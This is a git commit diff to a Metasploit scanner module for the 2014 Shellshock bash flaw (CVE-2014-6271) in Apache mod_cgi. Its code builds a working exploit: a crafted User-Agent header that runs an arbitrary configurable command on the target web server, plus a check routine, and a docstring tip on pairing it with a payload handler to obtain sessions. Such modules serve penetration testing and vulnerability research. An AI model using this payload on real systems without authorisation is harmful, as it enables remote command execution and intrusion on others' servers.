Reimplement old check code I was testing before

wvu · wvu · commit 62b74aeaed52 · 2014-09-25T06:38:25.000-05:00
I would like to credit @wchen-r7 for providing advice and feedback. @jvazquez-r7, too! :)
diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -20,15 +20,15 @@ def initialize(info = {})
         the HTTP_USER_AGENT variable.
 
         PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your
-        CMD, set ExitOnSession to false, run -j, and then run this module.
+        CMD, set ExitOnSession false, run -j, and then run this module for lulz.
       },
       'Author' => [
         'Stephane Chazelas', # Vulnerability discovery
         'wvu' # Metasploit module
       ],
       'References' => [
         ['CVE', '2014-6271'],
-        ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
+        ['URL', 'https://access.redhat.com/articles/1200223'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],
       'DisclosureDate' => 'Sep 24 2014',
@@ -42,21 +42,32 @@ def initialize(info = {})
       OptString.new('CMD', [true, 'Command to run (absolute paths required)',
         '/usr/bin/id'])
     ], self.class)
+
+    @marker = marker
   end
 
-  def run_host(ip)
-    marker = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
-    user_agent = %Q{() { :; }; echo "#{marker}$(#{datastore['CMD']})#{marker}"}
+  def check
+    res = req("echo #{@marker}")
 
-    res = send_request_raw(
-      'method' => datastore['METHOD'],
-      'uri' => normalize_uri(target_uri.path),
-      'agent' => user_agent
-    )
+    if res && res.body.include?(@marker * 3)
+      report_vuln(
+        :host => rhost,
+        :port => rport,
+        :name => self.name,
+        :refs => self.references
+      )
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def run_host(ip)
+    return unless check == Exploit::CheckCode::Vulnerable
 
-    return if (res && res.body.include?(user_agent))
+    res = req(datastore['CMD'])
 
-    if res && res.body =~ /#{marker}(.+)#{marker}/m
+    if res && res.body =~ /#{@marker}(.+)#{@marker}/m
       print_good("#{peer} - #{$1}")
       report_vuln(
         :host => ip,
@@ -67,4 +78,16 @@ def run_host(ip)
     end
   end
 
+  def req(cmd)
+    send_request_cgi(
+      'method' => datastore['METHOD'],
+      'uri' => normalize_uri(target_uri.path),
+      'agent' => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+    )
+  end
+
+  def marker
+    Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+  end
+
 end
